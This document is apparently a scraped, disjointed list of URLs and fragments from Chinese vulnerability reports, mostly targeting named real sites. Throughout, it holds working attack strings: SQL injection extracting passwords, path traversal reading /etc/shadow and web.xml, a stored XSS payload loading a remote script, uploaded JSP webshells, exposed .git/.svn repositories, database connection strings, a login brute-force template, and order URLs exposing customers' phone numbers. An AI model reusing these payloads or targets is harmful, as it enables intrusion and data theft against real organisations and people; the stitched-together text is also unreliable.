http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm http://www.zhongchou.com/settings-save_consignee http://61.142.174.200/cwc/KFweb/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://cycwc.gzife.edu.cn/kefa/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://cw.syu.edu.cn:8080/KfWeb/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://58.16.80.232/kefa/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://221.5.51.228/cjb/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.shcdkf.com/kfweb/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.wooyun.org/bugs/wooyun-2010-097645/ http://blood.sdo.com/NewsApp/GetVoteInfo.ashx?naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818 http://61.142.174.200/cwc/KFweb/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://cycwc.gzife.edu.cn/kefa//admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://cw.syu.edu.cn:8080/KfWeb/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://58.16.80.232/kefa/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://221.5.51.228/cjb/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://www.shcdkf.com/kfweb/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://58.67.199.170:8090/ http://58.67.199.170:8090/hawtio/ http://58.67.199.170:8090/admin/ http://178.ctbclife.com/ASP/parkingFund.asp 
http://123.232.100.133:8080/WEBOA/control/main http://123.232.100.133:8080/jmx-console/部署war拿shell http://ibi.cqupt.edu.cn/report.php?term=28 www.352.com http://www.352.com http://edu.csdn.net/courses?attr=3&c_id=0&level=1 http://www.xkb.com.cn/.git/ https://ibank.bankofdl.com/perbank/downloadTransferList.do https://ibank.bankofdl.com/perbank/showBuySavingsConfirmPage.do https://ibank.bankofdl.com/perbank/queryProductLimit.do http://61.148.24.182:8080, http://61.148.24.182:8080/acc/bindipmac/static_arp_setting_content.php?arpName=123%27%20union%20select%201,1,1,1,1,1,1,%28select%20password%20from%20USERINFO%29-- http://61.148.24.182:8080/acc/bindipmac/static_arp_include.php?ifName=123%27%20order%20by%202-- http://shop.js808.cn/ http://www.js808.cc/handle/getHelpContent.ashx?id=47 http://www.js808.cc/handle/getHelpContent.ashx?id=47 http://m.ly.com/bus/BusJson/DestinationCity http://www.beibei.com/ https://github.com/salever/weixin/blob/5bf0fcc7aab91081322027b47321a3c94a4fe5de/java-weixin-sdk/src/main/resources/config.properties http://www.yyth.com.cn/position/zp_index.php?id=5 http://www.yyth.com.cn/position/zp_index.php?id=5 http://sqlmap.org http://shop.vivo.com.cn/gallery-ajax_get_goods.html http://shop.vivo.com.cn/gallery-ajax_get_goods.html http://shop.vivo.com.cn index.php/admin/authentication/forgotpassword http://survey.xoyo.com http://www.concords.com.tw/event/event_data_view.asp?ID=492 http://ischool.edu.sina.com/school/lists.html?country=&course_style=1 http://ischool.edu.sina.com/school/lists.html?keyword=1 http://ischool.edu.sina.com/school/lists.html?page=\&school_city=171&school_prov=8 http://s.readnovel.com/.svn/entries www.dlb666.com http://ag.mcds.com/ http://sms.mcds.com/index.nja http://m.zhenpin.com/.svn/entries http://www.hyjsjd.cn/UnitValue.aspx?id=0100061 http://218.7.239.170:81//UnitValue.aspx?id=0100061 http://www.spjdz.com//UnitValue.aspx?id=0100061 http://www.thszjz.com//UnitValue.aspx?id=0100061 
http://www.jljszj.gov.cn//UnitValue.aspx?id=0100061 http://59.151.121.82/ http://baike.huaji.com/index.php?edition-compare-1 http://m.beibei.com/ http://m.beibei.com/detail/detail.html?iid=1969733 http://m.beibei.com/trade/cart.html www.beibei.com的订单中心看一下详情吧。 https://github.com/Kevin2030/finance_monitor/blob/9c4ffc8dd773ee072648de3a2e5d7b8afabf638a/src/main/resources/monitor.properties www.go.cn https://technet.microsoft.com/en-us/library/cc960241.aspx http://www.lefucn.com/index.php?r=home/default/expert1&category=1 http://guso.zszq.com:88/detail.asp?d=123&t=C227 www.esunsec.com.tw/z/zk/zkf/zkResult2.asp http://www.16wifi.com/usersystem/log.txt http://ads.zhongsou.com/.svn/entries http://www.zsb.ynutcm.edu.cn/wcm/customform/list.html?projectid=2 http://apzx.gzaj.gov.cn//wcm/customform/list.html?projectid=2 http://test.gzaj.gov.cn//wcm/customform/list.html?projectid=2 http://fwzx.gzaj.gov.cn//wcm/customform/list.html?projectid=2 http://gzaj.gov.cn/wcm/customform/list.html?projectid=34 http://www.gaxq.gov.cn/wcm/customform/list.html?projectid=283 http://club.kingdee.com/ http://club.kingdee.com/home.php?mod=spacecp&ac=profile&op=address&address_action=del&areaid=350 http://kefu.xoyo.com http://221.214.13.10:5003/login.aspx http://221.214.13.10:5003/CZFW_Details.aspx?id=RN2722 http://221.214.13.10:5003/FZ_Details.aspx?id=RN37010220150321091708001 http://221.214.13.10:5003/FZ_Details.aspx?id=RN37010220130326121024001 http://221.214.13.10:5003/FZ_Details.aspx?id=RN37010220130327164325001 http://m.wanzhoumo.com/.git/config http://light.wanzhoumo.com/.git/config http://openapi.wanzhoumo.com/.git/config http://www.wanzhoumo.com/.git/config www.wanzhoumo.com www.ikonke.com http://www.lk34.com/ http://218.92.102.170:9090/ url:http://www.hbqx.gov.cn:8081/admin/index.jsp http://wenku.baidu.com/view/2b6ec2acaef8941ea76e05b8.html https://202.110.92.42/ http://sales.feiren.com/admin/login_login.do http://sales.feiren.com/2.jsp 
http://group.tempus.cn//pw/job2/ui/employ_introduce.aspx?company_id=178 http://m.suning.com/dl/qJeA5UsD.html http://www.wooyun.org/whitehats/%E5%B0%8F%E6%89%8B%E5%86%B0%E5%87%89#suning.com suning://m.suning.com/index?adTypeCode=1002&adId=http://m.suning.com/ http://31.220.48.93:28214/sn/jm.html http://drops.wooyun.org/papers/548。在android http://31.220.48.93:28214/sn/ls_0.html https://github.com/jjkakakk/ajihttpd/blob/master/sms.html)读文件等等,而这些命令的执行权限正好是苏宁易购本身,所以正好能够配合0x03读取用户数据文件 http://124.237.87.30/ http://a.m.163.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=file:///etc/shadowhttp://a.m.163.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=file:///etc/shadow http://a.m.163.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=var/lib/locate.db%20?file=../../../../../../../../../var/lib/locate.db%20?file=../../../../../../../../../var/lib/mlocate/mlocate.db http://www.352.com/member/info/agreeInfoById.do?id=1111 http://www.352.com/member/info/agreeInfoById.do?id=2222 http://www.352.com/member/info/agreeInfoById.do?id=7777 http://cservice.client.189.cn:8004/map/clientXML?encrypted=true http://sdfz.gwbnsh.net.cn/ https://115.159.64.131/.svn/entries http://pay.qun.hk/.svn/entries http://www.hbjjzd.cn/detail.php?code=808&table_name=tb_common http://202.117.122.44//dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://211.81.174.133:81/dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://210.37.2.181/dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://202.118.250.140/dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://210.34.4.3/dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://202.195.177.13/ebook/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://ebook.nwu.edu.cn/homepage/bulletin/bulletin_list.asp?lang=gb&action=list http://101.227.68.201:8099/Login.aspx http://124.237.87.30/ http://222.210.17.165/zsjhW.asp?KYear=2015 
http://222.210.17.165/xsdh.asp?id=137&CName=%C8%EB%D1%A7%C6%AA http://222.210.17.165/xkjs.asp?ID=126&CName=%BD%B1%B4%FB%D6%FA%D1%A7等 http://www.hbqx.gov.cn:8081/search_list.action http://www.jiayuabc.com/kecheng_info.aspx?News_Id=624000000000 http://mp.yiban.cn/ http://www.kflib.cn:8089/opac/dzxmjs.jsp http://scsk.crsp.org.cn:8070/opac/dzxmjs.jsp http://211.86.195.15:8086/opac/dzxmjs.jsp http://scsk.crsp.org.cn:8070/opac/dzxmjs.jsp http://58.133.216.9:8070/opac/dzxmjs.jsp http://www.kflib.cn:8090/opac/dzxmjs.jsp http://58.118.253.4:8070/opac/dzxmjs.jsp http://222.56.16.81:8089/opac/dzxmjs.jsp http://lib.hhhxy.cn:88/opac/dzxmjs.jsp http://59.51.114.198:8088/opac/dzxmjs.jsp http://tsjs.ndjclib.com:8070/opac/dzxmjs.jsp http://scsk.crsp.org.cn:8070/opac/dzxmjs.jsp URL:https://passport.vivo.com.cn/v3/web/login/login POST:client_id=&redirect_uri=&account=*****&pwd=*****&remember=0 http://www.zlsbpjw.net http://www.xc777.com http://www.0714.la http://www.haochibu.com http://dianping.alexue.com http://www.xishan100.com http://b2a.airkunming.com/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX201504126391535 http://b2a.airkunming.com/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX201504126391536 http://b2b.shenzhenair.com/b2b/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX2015031121397968 http://b2b.shenzhenair.com/b2b/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX2015031121397969 http://www.showjoy.com/p/146413.html http://www.showjoy.com/p/148750.html http://www.showjoy.com/p/148750.html http://fenxiaoportal.shopnum1.com/ http://www.dapeng.net http://www.minjumall.com/ http://www.qjzb.com.cn/ http://www.xiangliangan.com/ http://www.ctnz.net/orderAction!orderFinishPay?orderRecForm.orderRecId=20150415-CTNZ-914072&orderRecForm.memberId=201304121166350&orderRecForm.thirdPayTotalFee=118.00&orderRecForm.thirdPaySubject=%E5%8C%97%E4%BB%91+2015-04-17+13:35 
http://www.ctnz.net/orderAction!orderFinishPay?orderRecForm.orderRecId=20150415-CTNZ-914072&orderRecForm.memberId=201304121166353&orderRecForm.thirdPayTotalFee=118.00&orderRecForm.thirdPaySubject=%E5%8C%97%E4%BB%91+2015-04-17+13:35 http://mall.cmbchina.com/Order/OrderDetailGuest.aspx?sosysno=40304622&phonenumber=13811567135 http://mall.cmbchina.com/Order/OrderDetailGuest.aspx?sosysno=48442031&phonenumber=13922484972 http://pan.kingdee.com/ http://gprsb.ttkd.cn/e3oa/wtj/down.asp?action=%E8%A1%8C%E6%94%BF http://www.job.sdu.edu.cn/)Struts2的DevMode未关闭导致远程命令执行;网站用户为root导致危害性扩大,入侵者可随意执行命令。 http://www.job.sdu.edu.cn/)后台管理admin的密码的,想必网站的后台入口就是http://www.job.sdu.edu.cn/admin,在浏览器中输入该URL,出来的竟然是这个 http://xunjian.club.xywy.com http://dangan.app.xywy.com http://mxunjian.club.xywy.com http://mxunjian.club.xywy.com http://61.160.182.13/吉林 http://175.30.250.213/江苏 http://lbj.cikuu.com/ http://www.xinhuamed.com.cn/school/download.asp?cataid=28 http://103.26.1.180:8081/.svn/entries http://www.inglian.com/.svn/entries http://console-temp.showjoy.com/login http://taiwan.zizaike.com/user/91990/orderview/343518?page=1&os=mobile http://taiwan.zizaike.com/user/91990/orderview/343519?page=1&os=mobile http://202.120.199.94:82/ http://niu.lashou.com/index.php http://niu.lashou.com/public/Public/out_password_set http://niu.lashou.com inurl:ineduportal http://www.fhez.cn测试 http://www.fhez.cn/IneduPortal/Components/news/FileDown.aspx?OldName=保存文件名.txt&NewName=../web.config http://www.tjbhbus.com/ http://60.29.214.36:8081/Logon/UserLogon.aspx http://czrcb.net/ https://e.czrcb.net/ http://121.28.6.5:8888/LoginAction.do?actionType=quit http://www.mojichina.com http://uc.mojichina.com/findpwd?callback=http://bbs.mojichina.com/forum.php http://m.s.cn/member/receiver/ http://tjdt.tbmmis.com/Login.aspx http://www.fyyhbank.com/ https://e.fyyhbank.com/ http://wuxia.sgamer.com/bushandang/ http://**.**.**/pshop/login/login.jsp http://xue.huaji.com/space/business.php?u=1199795328 
http://xue.huaji.com/space/business.php?u=1199795328 http://www.189kd.cn:80/ http://cz.189kd.cn:80/ http://hz.189kd.cn:80/ http://zh.189kd.cn:80/ http://sz.189kd.cn:80/ http://fs.189kd.cn:80/ http://dg.189kd.cn:80/ http://zs.189kd.cn:80/ http://mz.189kd.cn:80/ http://zq.189kd.cn:80/ http://gz.189kd.cn:80/ http://www.189kd.cn:80/ www.189kd.cn http://lib.wap.zol.com.cn/bbs/content.php?bbsid=3&bid=30&bookid=7301 http://www.s.cn/member-2540670-del_sys_msg.html http://www.s.cn/member-2540670-del_sys_msg.html http://www.s.cn/member-2540628-del_sys_msg.html http://www.s.cn/member-2540627-del_sys_msg.html http://www.s.cn/member-2540626-del_sys_msg.html http://www.s.cn/member-2540670-del_sys_msg.html https://www.baidu.com https://www.pingan.com.cn/pinganone/pa/accounts_overview/setPFToken.jsp?url=https://www.pingan.com.cn/idp/startSSO.ping?PartnerSpId=bankSP%26TargetResource=https://www.baidu.com https://www.pingan.com.cn/idp/startSSO.ping?PartnerSpId=bankSP&TargetResource=https://www.baidu.com http://iosappapi.wepiao.com/index.php?a=filmdetail&c=film&m=web&fid=5577 http://iosappapi.wepiao.com/index.php?a=seatinfo&c=film&mpid=556e6c3eba8e7f73168bfdbb&m=web&cinemaid=1004676&hid=3197&fid=5577 http://www.wepiao.com/?a=filmdetail&c=film&m=web&fid=5420 http://www.wepiao.com/?a=cinemadetailshow&c=cinema&m=web&cinemaid=1004676 http://run.ikang.com/ index.php/user/DoResetPassword.html www.p2p222.com http://www.showjoy.com/ http://www.p2p222.com/index.php/user/Login.html http://www.nffund.com/fundList.jsp?company=1 http://218.7.239.170:81/UserCertList.aspx?ID=0100031 http://www.spjdz.com/UserCertList.aspx?ID=0100031 http://www.thszjz.com/UserCertList.aspx?ID=0100031 http://www.hyjsjd.cn/UserCertList.aspx?ID=0100031 http://www.jljszj.gov.cn/UserCertList.aspx?ID=0100031 http://tsg.hacz.edu.cn/Message.aspx?SectionId=7321547b-9cb0-4b2e-a7b6-8d50ccb72f9e http://lib.haut.edu.cn/message.aspx?SectionId=8aef847d-08da-443f-b781-9a61c7e75ae5 
http://210.45.134.251/Message.aspx?SectionId=a2a03a1e-8c18-40e5-97d1-7db9776c9fe6 http://www.nhlib.com.cn/Message.aspx?SectionId=5b21dc80-687b-4991-add8-0bb7e791faf2 http://lib.nyxx.sh.cn/nxtsg/Message.aspx?SectionId=c5ba6f29-6213-491a-9134-9068f1c3792a http://trend.baidu.lecai.com/ssq/red23SpanTrend.action?recentPhase=100&onlyBody=true&phase http://bcm.open.com.cn/login.aspx密码字段可以注入,虽然用了c#的防注入,但还是可以用sqlmap直接注入。 http://zucc.ctvc.tv/index.jsp http://try.suning.com/tps/report/listReport.htm http://60.170.41.219:7001/defaultroot/LogonAction.do http://www.myuios.com http://122.114.63.183:8082/Login.aspx httpp://appserver.showjoy.com/msg/list.html?page=1&userId=652434 https://cdc.zj.cn http://218.2.19.97/lgyzagl/aspx/JMGLogin.aspx http://218.2.19.97/lgyzagl/aspx/xuanze_yh2.aspx http://mingshi.wanfangdata.com.cn/Handler/UserControl/UserControlSync.ashx?Operate=CheckUserName&WFVUserName=wooyun&_=1433572345924 www.eloancn.com http://wiki.eoeandroid.com/.svn/entries https://supervise.352.com/supervisor/superAssociateEdit.do?at=bank&associateType=2&accountNumber=8618381404253972&associateId=12112 https://supervise.352.com/supervisor/superAssociateEdit.do?at=bank&associateType=2&accountNumber=8618381404253972&associateId=11112 https://supervise.352.com/supervisor/superAssociateEdit.do?at=bank&associateType=2&accountNumber=8618381404253972&associateId=111 http://www.sdlc.lm.gov.cn http://member.suning.com/emall/GiftCardStaticPageView?storeId=10052&catalogId=10051 http://cart.suning.com/emall/SNEntityCardCmd?action=saveAddress&oldAddressId=&noAddUpt=0&addressId=&addressStr=Lily%3A%40%40%3A15189770036%3A%40%40%3A%3A%40%40%3A100%3A%40%40%3A9173%3A%40%40%3A11365%3A%40%40%3A146677%3A%40%40%3A%3C%2Ftextarea%3E%27%22%3E%3Cscript+src%3Dhttp%3A%2F%2Ft.cn%2FR29TAvp%3E%3C%2Fscript%3E http://dev.admin.shop.hichao.com/site/login http://app01.cast.org.cn:7050/download/download.jsp?filepath=/WEB-INF/web.xml http://kpym.cast.org.cn/web/download.jsp?fileName=../WEB-INF/web.xml 
http://java.sun.com/dtd/web-app_2_3.dtd http://crm.airpp.com/crmtravel/userManagerAction!login.action http://cicpa.wkinfo.com.cn http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh www.supor.com.cn/supor.sql http://inns.jinjiang.com/ http://demo.fnuo123.com/ http://dp.fnuo123.com/ http://dp.fnuo123.com/?mod=c2c&act=helper&id=132 http://dp.fnuo123.com/admin/?mod=&act=adv&ctrl=saveEdit margin-left:160px margin-bottom:20px http://60.171.18.27//teachweb/cxjk/SelectInterface.aspx http://teachweb.419.com.cn//cxjk/SelectInterface.aspx http://218.7.76.10:8080//teachweb/cxjk/SelectInterface.aspx http://223.72.237.130//teachweb/cxjk/SelectInterface.aspx http://sdjw.syu.edu.cn//teachweb/cxjk/SelectInterface.aspx http://shimo.yundasys.com:45149/adage/userlogin.action http://xynu.check.cnki.net/ www.dangshi.cnki.net:8080,成功上传Webshell后以备后用。 www.dangshi.cnki.net开放了80和8080端口。因为这两个服务器也无法连接外网,所以不能使用reverse_tcp来反弹meterpreter,只能考虑使用bind_tcp的方式。 http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo8.aspx?id=17 http://www.dtzwdt.gov.cn/portal/xzsp3/newsinfo8.aspx?id=19 http://211.142.37.152:89/portal/xzsp3/newsinfo8.aspx?id=11 http://www.gczw.gov.cn/portal/xzsp4/newsinfo8.aspx?id=19 http://www.gjzwzx.cn/portal/xzsp3/newsinfo8.aspx?id=19 http://itest.heep.cn/ http://preenglish.itest.fltrp.com/ http://itest.heep.cn/为例,问题的产生是由于该套建站软件使用的编辑器fck未正确配置 http://itest.heep.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://itest.heep.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://itest.heep.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector 
http://itest.heep.cn/UserFiles/wooyun.jsp http://itest.heep.cn/UserFiles/wooyun1.jsp http://itest.heep.cn/FCKeditor//.svn/entries http://itest.heep.cn/admin//.svn/entries http://itest.heep.cn/oa.log http://www.chinabidding.com.cn/download/download_file.jsp?record_id=4231669&filename=web.xml&filepath=../../../WEB-INF http://www.w3.org/TR/2003/WD-wsdl12-20030303/#ietf-draft http://111.11.28.14/Qt_logout.do http://kjxy.jxnu.edu.cn/ http://219.229.248.14/ http://www.dingruan.com/ http://www.dingruan.com/product-2.html http://www.dingruan.com/case.html http://www.bjzzjbz.com/Login.aspx http://118.125.106.216:88/Login.aspx http://220.189.233.18:81/Login.aspx http://www.6years.org/Login.aspx http://125.65.92.216:81/Login.aspx http://202.117.122.44/dlib/homepage/news/news_list.asp?action=list&lang=gb http://211.81.174.133:81/dlib/homepage/news/news_list.asp?action=list&lang=gb http://210.37.2.181/dlib/homepage/news/news_list.asp?action=list&lang=gb http://202.118.250.140/dlib/homepage/news/news_list.asp?action=list&lang=gb http://210.34.4.3/dlib/homepage/news/news_list.asp?action=list&lang=gb http://202.195.177.13/ebook//homepage/news/news_list.asp?action=list&lang=gb http://ebook.nwu.edu.cn/homepage/news/news_list.asp?action=list&lang=gb http://dlib.gsjtxy.edu.cn/dlib/homepage/news/news_list.asp?lang=gb http://sxebooks.com/homepage/news/news_list.asp?lang=gb http://m.eloancn.com/wapwmps/.svn/entries http://whoa.caams.org.cn:7001/defaultroot/login.jsp?localeCode=zh_CN http://sws.suning.com/ http://www.kfnl.gov.cn http://i.club.sohu.com/?action=sendVcode&controller=ajax http://www.suning.com.cn/article/noticshow.html?id=91551506020556 www.wepiao.com/?a=init&areano=57fa1a9acbe314b31791048436914425&c=cinema&m=web&pagetype=0 www.wepiao.com/?a=seatinfo&c=film&cinemaid=1 www.wepiao.com/index.php?a=seatinfo&c=film&cinemaid=1003990&fid=5568&hid=2&m=web&mpid=5571395fba8e7fbb4b8ba4e3&scheid= www.wepiao.com/index.php?a=comepaynew&c=film&m=web&orderid=1 https://54.255.168.149/ 
http://my.suning.com/authStatus?callback=jQuery17206592 http://my.suning.com/memberInfoPageHead.do?callback=jQuery1720402 http://www.suning.com/emall/myShoppingOrderCmd?itemNum=3&callback=jQuery1720659299 http://my.suning.com/address.do?callback=jQuery172081 www.eqiyun.cn http://www.eqiyun.cn/cloud/uploadeFiles/img/headerImage/1432891846112/2203803155802475043.jsp http://www.husor.com.cn/ http://ticket.husor.com.cn/ http://ticket.husor.com.cn/users/183 http://travel.xiamenair.com/Travel/Domestic.html?start=%7Cundefined&end=%25u53A6%25u95E8%7CXMN http://www.wlyfw.com/phpmyadmin/ http://g.gome.com.cn/ec/homeus/support/add.jsp?callback=jQuery17&method=homeus.checkAllItem¶ms=%7B%22time%22%3A1433603338755%7D http://g.gome.com.cn/ec/homeus/navigation/gome/index/loginStyle.jsp?callback=logintop http://g.gome.com.cn/ec/homeus/n/topMygome.jsp?callback=topMygome http://member.gome.com.cn/myaccount/address/getSecondaryAddress?timer=1433606988720&callback=ckdata http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123 http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123 http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123 http://www.xtep.com.cn/pay/&order_sn=150606002066 http://www.xtep.com.cn/pay/&order_sn=150606002042 http://www.xtep.com.cn/?app_act=mem_center/index/order_info&order_sn=150606002042 http://8007117228.com/login.action www.1510cloud.com http://hyt.wuhan.net.cn/中国电信武汉分公司 http://tc.chinatietong.net/中国铁通空中会议室管理系统 http://dhhy.xaonline.com/陕西省电信公司电话会议系统 http://211.138.195.27/华为电话会议系统 http://211.139.93.135:8080/华为电话会议系统 http://newconf.bjtelecom.com.cn/北京联通电话会议系统 http://interchat.bjtelecom.com.cn/北京联通电话会议系统(不同ip) http://hyt.wuhan.net.cn/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=C:\Windows\system.ini http://hyt.wuhan.net.cn/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=D:/webv5.2/resin-pro-3.0.14/conf/resin.conf http://www.citsha.com/list.php?sid=4 
http://m.eloancn.com/wapwmps/loginOnMobile.jsp http://www.jinjianginns.com/的修改密码处,不需要原密码即可修改新密码。 http://mem.tsinghua.edu.cn/ShowPic.asp?PicID=29 http://mem.tsinghua.edu.cn/Admin/login.asp http://www.sino-life.com/ http://health.703804.com/.svn/entries http://a.703804.com/admin.php http://fr.linekong.com/xml/common.php?sort_id=* http://home.70.com/.svn/entries http://www.anta.com/Inchon2014/admin/admin_index.php http://ticket.husor.com.cn/ http://61.129.250.82/ http://61.129.250.82/staff/conf/demo2.jsp http://pos.dapu.com:90/bpos/getUserInfoJSON.jsp?storeids=select%20a.C_STORE_ID%20from%20users http://dag.shou.edu.cn/Search.aspx?search=%E5%9B%BE%E7%89%87,注入参数search http://web.kuaipan.cn/user/login处多次输入错误的账号密码,都未有图片验证码以及IP锁定策略。 www.kuaipan.cn http://www.kuaipan.cn http://xb.cuit.edu.cn/ http://xb.cuit.edu.cn/eweb/admin_login.asp http://**.**.**/login.jsp http://58.67.199.202:8090/admin/login.oo http://www.tna.com.tw/.git/ http://bat.sanquanxianshi.com http://118.26.133.98:443/svn jdbc:mysql://sanquan01.mysql.rds.aliyuncs.com:3306/sanquan?useUnicode=true&characterEncoding=utf8 jdbc:oracle:thin:@115.28.53.202:1521:dev jdbc:oracle:thin:@211.151.211.168:1521:orcl comifengnewsclient://call?type=doc&id= http://api.iclient.ifeng.com/ipadtestdoc?aid=99008381),返回的是一个json,其中包含这个新闻的所有信息。然后这个app就会按照这个json文件把新闻展示在页面上。整个过程完全没有验证URL或者是信息来源。 comifengnewsclient://call?type=doc&id=URLB。URLB中则返回一个虚假新闻的json,效果如图: http://31.220.48.93:28214/if/fakenewsjm.html http://api.iclient.ifeng.com/ipadtestdoc?aid=99008381)包含新闻信息的json中,出现了html标签!这也就以为着这写信息非常有可能是展示在webview中的。首先的想法就是在json的title字段添加js语句,发现不能执行,百思不得其姐!后来突然想到既然能加载图片,那图片的事件呢?果断在之前的字段加上 http://116.211.28.174:8080/services.html http://www.sinochemoil.com/esbclient/layout/Export.php http://hnhp6660201.w215.bizcn.com/qghk_content.asp?ID=13 http://hnhp6660201.w215.bizcn.com/login.htm http://user.yaolan.com/ http://user.yaolan.com/FindPwdSuccess.aspx?uname=admin http://121.33.234.163:1122/sys/Login/login.do 
dir:D:\apache_tomcat\tomcat7_7080\webapps\ROOT\ http://121.33.234.163:8080/Cherry/index.html同样存在此漏洞 http://121.33.234.163:8088/移动办公管理平台 http://www.haier.com/cn/ JHSoft.WCF/POSTServiceForAndroid.svc/LoginNew http://test.sangfor.com.cn/ http://dev.theme.nubia.cn/ URL:http://www.chinaamc.com:80/portal/en/second.jsp http://doogua.dangdang.com/ http://doogua.dangdang.com/f.php http://doogua.dangdang.com/memcache.php http://im.suning.com/ http://www.bawang.com.cn/System/backup_datebase.asp http://www.qhgsf.com/wwwroot.rar http://www.beilingdi.com/ http://61.237.231.66:82/doc/page/login.asp http://doogua.dangdang.com http://doogua.dangdang.com/auth http://fuzhou.chaoxing.com/ http://fuzhou.chaoxing.com/api/front/book/bookDetail/first?dxNumber=000007851564&d=C87FEE5A48836CA748F6F0537A183B33&fenlei=151112 http://zb.suning.com/bid-web/initSupplierApply.htm?supplierNo=SN00000432&proNo=SNZ8014150228951是打不开的,但是我注册任意一个账户后,再次点击发现 http://zb.suning.com/bid-web/openSupApplyInfo.htm?supplierNo=SN00001763&proNo=SNZ8201141024933 http://zb.suning.com/bid-web/openSupApplyInfo.htm?supplierNo=SN00000432&proNo=SNZ8000141024924 http://tms2.yihaodian.com/system/login_login.action?redirect:http://admin.soso.com http://www.lijiejie.com/wp-content/uploads/2015/04/tencent.com_.txt http://admin.choumei.cn/index.php/Login/index index.php/Login/doSubmitLogin http://yunpan.chaoxing.com/ http://www.bestv.com.cn/index.php?a=lists&c=index&catid=27&channel=1&m=content&modelid=11&movie_category=1&movie_special=1&movie_type=4&order=id http://www.bestv.com.cn/index.php?a=lists&c=index&catid=27&m=content&modelid=11&platform=1 passport.suning.com/ids/login POST:jsonViewType=true&username=§username§&password=§password§&loginTheme=defaultTheme&loginChannel=208000000000&rememberMe=false needVerifyCode:true Activity:com.suning.mobile.paysdk.ui.CashierPrepareActivity com.suning.mobile.ebuy/com.suning.mobile.paysdk.ui.CashierPrepareActivity http://www.zgkjb.com/epaper/test/regist.jsp?dowhat=registsave 
http://www.yxdaily.com/epaper/test/regist.jsp?dowhat=registsave http://61.166.63.106:9999/epaper/test/regist.jsp?dowhat=registsave http://dyrb.dy001.cn:9999/epaper/test/regist.jsp?dowhat=registsave http://newcity.zzbtv.com/epaper/test/regist.jsp?dowhat=registsave http://epaper.xinjiangnet.com.cn/epaper/test/regist.jsp?dowhat=registsave http://epaper.xinjiangnet.com.cn/epaper/test/regist.jsp?dowhat=registsave http://www.zxsx.org/h_admin/add_xinyong1.asp http://www.zxsx.org/h_admin/add_xinyong1.asp?id=1078&pages=1 http://edoas.scedu.net:8080/oa encap:Ethernet AE:BF:C4 addr:192.168.24.136 Bcast:192.168.24.159 Mask:255.255.255.224 feae:bfc4/64 Scope:Link MTU:1500 packets:27311605 packets:33981021 txqueuelen:1000 http://www.eefocus.com/.git http://bbs.lengxiaohua.com/ http://bbs.lengxiaohua.com/uc_server/ www.buygaga.com http://61.142.174.200/cwc/KFweb/kfsf/Sf_HzQuery.aspx http://www.shcdkf.com/kfweb/kfsf/Sf_HzQuery.aspx http://gzcx.tynu.edu.cn/kfweb/kfsf/Sf_HzQuery.aspx http://cwch.ahu.edu.cn/querynetweb/kfsf/Sf_HzQuery.aspx http://221.5.51.228/cjb//kfsf/Sf_HzQuery.aspx http://www.cqvie.com/xfcxbn/kfsf/Sf_HzQuery.aspx http://cwcx.jlsu.edu.cn/kfsf/Sf_HzQuery.aspx 